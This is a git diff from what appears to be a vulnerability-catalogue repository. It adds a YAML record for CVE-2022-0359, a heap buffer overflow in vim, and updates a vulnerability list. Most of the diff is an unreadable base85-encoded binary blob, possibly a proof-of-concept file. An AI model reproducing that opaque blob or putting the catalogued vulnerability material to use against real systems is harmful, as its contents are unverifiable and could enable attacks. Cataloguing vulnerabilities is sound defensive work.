zC?w5NgTBuyQW5x^h8IQWaiLvn-%`G0tc!Yl45Y2Q)uOs{<kf<;ev-ISd_4}Po#%}>
z-t^Xuutdc&XaL)?w72Im{Y@zWXyqH>zKEf`+MgT>wK!hey)LY;rYrS@)5yktT2ZNP
zZ|$Xd=uHQIgK9<e6m-f_^)Osb)g7etUbnazlx5keXwY5PED(OSj169BS}E6FwzNO`
z?E=|}P&1(dG%G}5Q2Iou#x2hEii7Fjw11}d9TzhqM0Q8vwpe$gM8GL`#4j^!T6aaP
z;A`6+W(h+~pB=}}>NvZ;y1RO94Vy_#_N_=Jab<EFsuYYtg{R*8Y~xi(p_C8*<vr2b
z2eS|%$OO=&u2)5-C%I0lCJlaRDH+_W6nU!9^U`S32>f({G(nhWl5{oY4Kq2ynwW}*
zQf1Fl(fbzK0K(i~esC3m{I{uTl<wRzHaN&|*_ad;iyiXAGNtVI;ynF{?uW7F=|RRx
zz8(OuAVi<7a!vOK>M@0n_xgjwRvGMCxC~TjR(vT@b$xsEAq?++4A*Yd9eal_QLFg&
zB?##)AWuApAG|O$6snNI5Yshn&*5MYNn@?b&;v7$IkwwWRfZ@g=-|8`n==10aos9h
zl%*bz{Yy`7pL9XT=QJTm^s&7yD>x#Dd2+`!@`0BYJK|AxzIN!l(|7D~9&Ws-pE|Dg
zAayB`O<7(+{O>DKKn}z#9(Nx`+|La|DV(xAU+|jNCkeTV{k}roZOcnv!if$br#_J5
z`KSl0e=2IdxK(r9wa{_9g*&X}Wn)tfwzQrt<_zMZ?b_<=(0iMQHNx%MK799xTiFgo
zHmy0=g`}WaEbn*h6)m~7Z-kKEhnGubiR#HijmeQN#NJsF6{&3aJ`z*6TyGv=n&l;x
z39DPT<)SL7T-YiYb&{7L?UsJik2*AsiJk`G+4a}^Iimsc5zgM#^~YDMde29TUe<8Z
z_XG_l&mFJ(RN|4DyoJ+0sjzq?ufS<Xq`DKOIEE@HV*DWKL^@&UrbM@(C)9RmQTKx`
z$U%}V@BHrtLkztDMyn=p8g*ATjU};a3|I6Ump4zq-n_a>-7g2K@xtK6g*)5h7+pF5
zXk+z8nIajei11V8Gt}UF-(ZHrjGoQod~<Uvp777j3(|qoEhWrp#$4=!fP{=gai?F*
zf(mQ)?E7rsh+~-LiorNJ$>C0eNrV^@s_GPcmcfCJk0c`ekeL3u#xj*Ez8O)`UO@3F
zjLFCnz&{R__M%kCV9<k7d5U)-<mOsgcjDUHvt^oXhep(}a$rdh`S{N*#VyFBu)&^>
zX9ipspo6AB&5OdeYf317|9a&jY)%}-Py2+KH4Pg40EM4d#W=~dl*vptcl!9ZM*CwK
zj0Ve~YUJxz8PB)Ac?>z{<l)3Jp<n#eQe6$n#nf;`j{UZnnP~UIP`n9$<RpnYR93^R
z<R(cniw%x=_ZbcHnW_P;DBhFFo7PmmbIj+}Wk>|y(0jUmG;@Fh^y<fpnFN*+($85%
z<grcL#vJW}tzXU$Lg)gb{Nk3ONiD51!9yQ}AO!ET$E4j|`G}9yi&yGZGG<ZQ1)oah
z6`hKj9JZIkcljr|mba6PsR?kp)*Yk~Sga5!y)39+q2MZAffhvdC8WoblscpGY7Z||
zKj19LbCn~&z;puEVts7${F)j^#y8RDJ$fmhEsA~z7QiI5NMfK5tzk_uGa04i;UnD=
z8<`!_xChuL<SLhG)%7cV0=s;;osYbt6(eR!s*;mhnA3MzrR-4{cejNX?c%0eN9EXZ
zco<YXru$9s{?YTtWQrl-DFGhyqz_R7`xY=c6l|5Fc@L-89Z&dTE6fQ(FJuxVI;f;S
znu|USf2=kK@CVr+$&iTZtd~EFp&{o8+>^bLUZ1=o+V5wWy9FsYKi#BA$p-1Yj+HJN
z^;gy?rL=v}r`rU;mpQ%F`E#F>%Jy1L7gaJU<R>XgQcl^uFeurA0<NJ_CDM|wgM$)o
zyW)xg?zcx#c)ZPe17oZCWpue7i&}}42<Sq`o<&2rbf2^XlBWwD_hS=RG`SYg5kR7O
zc$Q9!oXyrVM}+zf`odZB8QJ&~IJUQ(2eke+Z8q*fFPMemmhA<@pYE1C{px5lzTO|X
zp?sH1A?Y!pvhFRhK>9SeK5liDy%Ukw#+37lMp>+n3XjWW#TX(XCFQ4M8?%QMzClZ^
z`VcE~%k`l}80OeuC7hCu4g#CqrYt$KT$?M;KAz)*SYLAit3~RMWp3_uZ*NCkcPU+s
zW?FfNXp?~N!GB1EIDB7+k+oHCjzHa##ezgvkMaomqs7k}IRL>VOfXKaX{hgFnXy#I
z>H&@<)G;x^M&fZ+OyaTK)B|{|aUwgcmz}>7!1>geKu_&#Z!#imB<ZR)fBi7$iwCvl
zZAlb`!wXY2q%1ksNb%)i@b4wb3&aMxmrFZ^gwV4UX7Sp7X+eb%I`YadAjE!vA9B-Z
zPcoh4Is)bJusSu5DQ6e$u8u4Z&+8DaU83c%u3f@_c_n5Ua%+ejuWN6#BhM?uxpIxB
z&ShN}gVh4eTzpyY-CI-E!4WyRcdw%@?Ab_njvoT<B*ME^@%-BDdKEcT``4;eI`HLw
z#f)WwD}J)W7T*Z5BbHcP#o{U2=OzIG$$F_a4goA&()Wk!4MknS?d`cs$qGSITxvL=
zqonOI<$IYh`!R^NIy9o3PkKf+D&~B?D4ioHeR<J?pf?n!x5D0S#jInl0Ev0mFFh`i
z<h%#aat?k1ChbE|VLzYP-S~6Nw{PI0+;nRep)-|&pyu#MQf!9?%s(n^=MQg4b_xxD
zF2_?inE`zt*OI`--Zu6ktmWR`I>QEA#C-qTlUi;L^3hM-j1*327&d-I&p6-lauWN7
z!}S1hE;jP~0P-wPZH@|u>{&K8kZqc4H07G}jrELiB>jzy&H4$h;>9JdU_oc`Py8P`
z6#q`mnx^Y>-6pzB{?p$-;G*+~$F4XOAN~9O7ik~v`g0K_C91OmSsyg;Esw!cVb|^j
zEkSH5tO(X{BbMaotL{DoQ%C!Hh`gav)`~&NsPp`jXZ*yCru}{?!LtYZYvCZj+C3?l
z?~NA*%6Sr&^ELuf4#i4=k!khWypR6gmqDiaz8rh8Ra0r*K00oo73~Hlv{dM5XxouP
z$^~oy?Z2awS)Si7$|!=yU@>Bc4qtqmb1T;>)u|qW6PTO7+376sSsXrzRH%h}Ki-Xk
zf+k_UqMZrvbXoVt?{zjQ>nB{0@EL|&{ZUo*nC6Yg_x!5u%%l$Xs78w0f7a(Gm{poU
zOteKf*i$V)KcE+p@!pLsR8(H8)X<IM8!DLPb%xV~&1_lxO{&df{p(P?PS?irc|DYv
zf%4MPrwB&teh&Z_UZzwh78SL(WdS#fsU>`N{sIbO7N54bB6vgiP@z!=22lCKGg_R7
zLqcDuR$%pEb?9kiu*mj}_649$q>#@hKtMrv#5hUMm7?z&wT`g-5A-{eyvgOVIEm+d
ziX2f-Gwh4P-kK2p!de?gqy$3jnk>C%GBu%EA+t`%spgwZ!-~jQ(xR3cRbymR!FK?U
zt86`DvB!PWC|SjKI-JqIS*&8__LUhk(hq7U!Vend7RYz)8aI0S^xqOQ3*p>NPAl84
zj&_>1lrmUDA$^N^z#5rtO|@3c$G`k#sqwQ+^Hnob?>(NsLoUx+OrubjlDu@Qu8|{&
zbnRkox@fKpwnXNUPyNf}R4LuLzK-yTDW!6GI7kMGf|&X^z0au&VBD0YU=YJ<x<pPD
za#3n=wzdyv^W>Z|Xr6|g|1GoeE3$Ql{41+<m)V^cP;%3Q5OD%i%4|lwnp)SfHT^ys
zul-Avt7v}!yI*4$YrZaCs7OkJ>Bdd`f_&E*w!>?1wo*}AV}EpGzO=EQsbD=FL;u%k
z{;=2k!h*1|^<vfa>wmGW3t!2G>$V7wGb!t`o}<YWf@K#r*~9$M<_INP#Z3#ok%$gr
zTT2`bNwg3wA+#_$GLo=Q#BzzS?n5|U=5y0l$KES0X<Qp?bD&LZ=|r40#r{vDd$O-6
z!ABD~BG2jz9=nT;94Vu~N*b`OaLQ(V;T5(YSzmP;te52+4_1^Xr-IZzFG1fNEaEoY
zG(#5^nKR8)6CuLpJnd;h#8@)uwqB2+Uf~``*zdrU#H^ULU3AyvBeCfN%nC~R&?uur
zD)#E_CckGy^gvjJI*AY?*4&jUgP(4D7>A++PRwfIb`EnY8^J1KbhY}<?Eu~+#;bOZ
zi=|`R?Rj1HII;)ok>@RJOsKAAe8Lao?k-fH>#d?13R{VT4)h$VJ^~W0j)!#GQC^q3
z^Z(V{<_kST0gUaZezVfygAcX66+SdQTw{>9%M}P>78o+$6MQ>tOu}6@XXS1`Jj#2q
zJhx66u1=Dolq^e16M2yD7O|&<@zD)HYM?i{Jq`|y_B5Sn0a9Ea00s`M0r`Bxo?zKr
znBV)4U+KGTFe>QYfvAFo$O|$toepp2scB{^Ss^eF2~t~RW|Oi00sMC1@9>Tim7`s~
z@9iQv&X9wHF68p6cdV@;-7NQK%uoTg*n!!d0-m?G4b|rW&yJrj5dX;AhB6GWXY-V6
z`rnBA58JdwI6!nzUwC@E*p`QXMpta3`aV&Kh?8SC7DCZmBjIDS?k6(^#s78?fGYH0
zUaHxFB-&Rm$cv1;g@iV%F!wHgp2_6Cbm`=nytUTm5#x&!NWbqxT{qj*)C5R|ek~p5
z|7W=h$RhtBL2NnlJW7y!*p9}10Kme;;z$F-i}`iP%|r9EF(a04k+jYFw|dznWZQ+t
zMI|-PLoaFi6+Tzr)>445k~{g0s9dqM_2Z_OsQXz;;g0=dIBW8=hH*4%b&StHyx<Ie
z(gX^U1a}vurNH%P{9II0FfCF#7%9?Dhf|nBX1AA<KdstyqWRiv`*~f~DJ#UIn-P}Z
zSHQJX<jl#ywFq}$&e4XGXi47tbhipcBa9y-==sFQNPjY3XWY}=J_i1^O#HFYX~BcA
zf!OQoBSFN^-HmYvXREj<x_*L)vcL#yY*fb~cd?MdV#&sLYQCQOr1|dM@bkpy?V62;
zXAija{R_$)`#r2o+7rZ@j}O<|^HLh>D4n!9486Sk%X&wqh`l`{n@w@4XuZk~%3sUq
zA89|k6sQHLUdy@H@P|OM9b4Dzo=t$I1ri`EB1wfu+kWknPTVZG9M5swms4*u;SK)K
z1h-E2fRyEV)iguKFZvd=p7F@mAL)f!(ZMKc9uClr4K_O4fA!P_5v<a{S^s51sYN>T
z%!QV(q%oz-?h@;JxU?yGczKNVq6Mxn6crTorpr{1LF*b|z)@X$xMpEX#BJurG)x7P
z^+OXfGOXjr|LJ3w$tHt_a_LC|1SNI?8|nYc$Vj09N`QTBBvxivp(?oiEgE+DQcVZI
zCV2|(ApDQN#RmC^ZSX4?62K#ofblCB@;$Bwc70BNqBnIlKg|6RTfSSxqS8Fq8Y?ic
z?^V$`7ehR_w3f2usIQJ`yturC?6|>tIvC_f{;x<ZS<7zwZ&j;64*i$65xjqeY3JTq
zmjJ$n9k1)1<r(2)pj2>a@L6D4218RkLr+Przxrw?0w5Wp&t)qx8O2P&o@&QBc5U%I
z3P61v?Wym$u)S)_k(-ZyPpld#aD;%?>Y}li8^)vMG!k<SH&5Lism|+=P<}@vZog2Q
zW>2V@>t=MFP_J?sg?~m<*uNZt5QcspUMe^T4kI;N7<FE&)uOOG4;vCr|B8hW^q6<t
zTv;N<zH$5`qr5<_r%UjC181`0i@$uD0!H;%-oLW2F}&{-4&IVM|FG3b#a|E2bPIq~
zHBV94<F9@=hr$OW05$x(tqXUWxTX*QS=ca#D|<yb>$*$7!B<YW6lN5p8FC1u?aw(z
zruD6=L1u`|ZP-E~1H{M7j;>~llC<OTo<Bc*u87-|KFQTN|9}F0k@=ba$3LufI=~hp
zeCzPQZCFBRxn#lMgXy){q>v+-tau(yAKX`F;37WK_f_wfB-mu&1s!uEy^v5-WB+Px
z6%+`*qO!)I{FduU_BH&&PnDm6)@?U9!Ql#FvBxt71O)xz*Jl9~+gtq9If#SFmW2{o
z7zA5XzQ`84YCdra`%1Cj=t0Gp(9<JMdThA`O7n@AMTcp;P=lbBHemCxLg>#_>;<`I
zZu&?}kR1-+cTR)#7HAzmqis*igo4*u2Kiy5lXO>bvz;eT+YbTtXl2p0`+l#vW^g9g
zaR-taNbYKet|69yCh)IZED@9x$YUTpLPepGWP|hH>5$J?ePLo{VlpzQadFDAsj0!Z
zEzX8_A&yi{9W~~?|9q-`<P)lbdr0dqs2B+>B}YzV(D)N}e29Iw5%;%5WU=>yYNi#-
z9oCLJLe~Gyjq@cM{xdWo!P9-XudU`%{yYf~smEAsCq_tT`y_>WJp6ka@usAIU7Uqi
zCaq95%xvd*e*{Pg6MGIP{hCWx2oq&&^o^$9gg(hilr?lm`R3qyj9;fF_Rpik?FM4o
zQRwQ(J5b&T^{K37mz>H<3`lsK`kly=dypq*EV_#L|K`TIxE`lwFzD5;)_U;JsT2s=
zL7l%JWCHqqJ=)+Ru~Y0Wt#n1W;@T9fcoJpWIgXJRGQT*j3QbwST!Zu6*=y<MAK61d
zOI1Bo@~KCCveHjfq**TNX1Tby5}2%KhH7eomO|Lu>J8*ax^`v<g9|O6ak2j8(g^ZB
zi-p3*)iswR%6k}EH}YN_GDtA~mc1j9*?MP=3-hUQF;K(^)n+K+@u_C-b{O`l%6*jU
zQL+3#dNp#cuEZi1q88E{)hz<mDzrl+QONZ+eA}<CZ<x2MJjQhju=$w&j!XJNtNhxy
z*fQ9MWE}`yScFD)=s4IccmvC<{xkz%P_+zdIHZqY$t0eAC3T-lF3zzz&|Mr3EKuD=
z(HFML_>YO$@_!^^&B#;n+<Fw^T=MB#UsMqBm_?>Ycc*(qij+S5W(B|w0ayVNzno5C
zMyB=Z>u%|C{Exf<lv3IM@B(a#xI=uG@j^cz@q`V4xHa@!5K5E(ePK-jV2{RhPpGWa
zW=QW<qHJs2uNR7=v8-8O)xC}r1!%EDfs6ZgXH3g#m%%s4X1TA3yk*qkF6p9#kHmDc
zlnK8C>M|S+sF14Z=J@AYhx81~I?ge79b>YC@dP5@lb~^LJ6{>(ZY1uKv{FU6yTM<v
zrYRA?lC~qB5`W8>?E&gW3HH244bc<NHW{YU$_yLKgZsZT4l7F%gY_@5)9Ci;-2#r@
z2YFB8TUrN~_TD$V!2r5Gwgch4uWc%s!1TKGV7Jjk?_GpbrgjsZW)EN3mKR|*6|^AX
zLj6K=vF6fPySoP}W!zC5yd{F=uL&p_@bD@@%%g4lsyyb1Z>vW0%h=Rfu=dO|!?5{h
zbuO~S5iWgWI^OcFVi@(g$Ii!tLK+}J+{FaY@`D-h72`GmQUAQIs-)0=r9#*s0`P_;
zDP2QX%2_Q?1Ln#;Z`F+N8?HX-exrN*n==9IYI-5Q;?sfk=(FX{RG~D4h?bH8n5;#A
zt7K%{KfDeXGqKQ8M^53g?g%H06S7a#fmwEn1hZ5_69(8haW<sJr#D4@2$+R#^Bso8
zX)j9PwqOcL)3rKC@H?u)1wFH(xm{1hdvGhK7;erNhYe33DwA&yKf>BwWP{SS4&ya~
z{I&s<BY+?w-BNp`R5sioI@HW<%)(dy_;*00a(++gN`?zGZoo=lArx$iE<{+?1nX%#
zUt8P0+q^-|JyVX{@Dl~tYPE8G+FpWzp*|)!4dXH#wOf+AjFg<9JtOpb`fo+u38sZ?
zCoNoRjrG+RFP0(h)bj1SO!&t_$3=T<mB!RPN|5MZp8=BDDzj7ONH;hSLH%1m6o4av
z5P#`52El!Q(NKQ?g(D(hLPXsa6*Y9VK}&;wHb!(%l>#Rqi0I6}FCa74AOKW#`aE1>
z`1@bm3HpK?p!+r^|BhX=ZBX?58g15fb#Q;1wq!tSNrTt|)Z6!u{L7a#AlTk7&u>>p
z{~R@<p5FpE0o^~EHUR$&`1FtE`y{o2--ol|4>$!KkUit?R})wz>jbf1ZSQF1`Ukc{
z2b{tgI5gt7RBI>L5gYKw(Br$;-PwOYn?{08kSbUKt&!iarqBRgDWKJGPG1rA`=C3)
z0jJOg+A{e4YJSbKzTjKUUOsML{xRtPuTSwC{!Hy+tJ#U`84%!0QdCZ)Tu9IV{{lA?
BSDyd?

literal 0
HcmV?d00001

diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml
new file mode 100644
index 00000000..63ba2110
--- /dev/null
+++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-0359
+source: https://huntr.dev/bounties/a3192d90-4f82-4a67-b7a6-37046cc88def/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: high
+  description: |
+    vim 存在安全漏洞，该漏洞源于在8.2之前的vim中基于堆的缓冲区溢出。
+  scope-of-influence:
+    vim < 8.2
+  reference:
+    - https://github.com/vim/vim/commit/85b6747abc15a7a81086db31289cf1b8b17e6cb1
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0359
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2022-0359 
+    cwe-id: CWE-787,CWE-122
+    cnvd-id: None
+    kve-id: None
+  tags: 缓冲区溢出,cve2022
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 2f4ff9ee..d5c6b05c 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -22,8 +22,10 @@ cve:
   polkit:
     - CVE-2021-4034
   vim:
-    - CVE-2022-0729
+    - CVE-2022-0359
     - CVE-2022-0629
+    - CVE-2022-0729
+   
 cnvd:
 kve:
   kylin-software-properties:
-- 
Gitee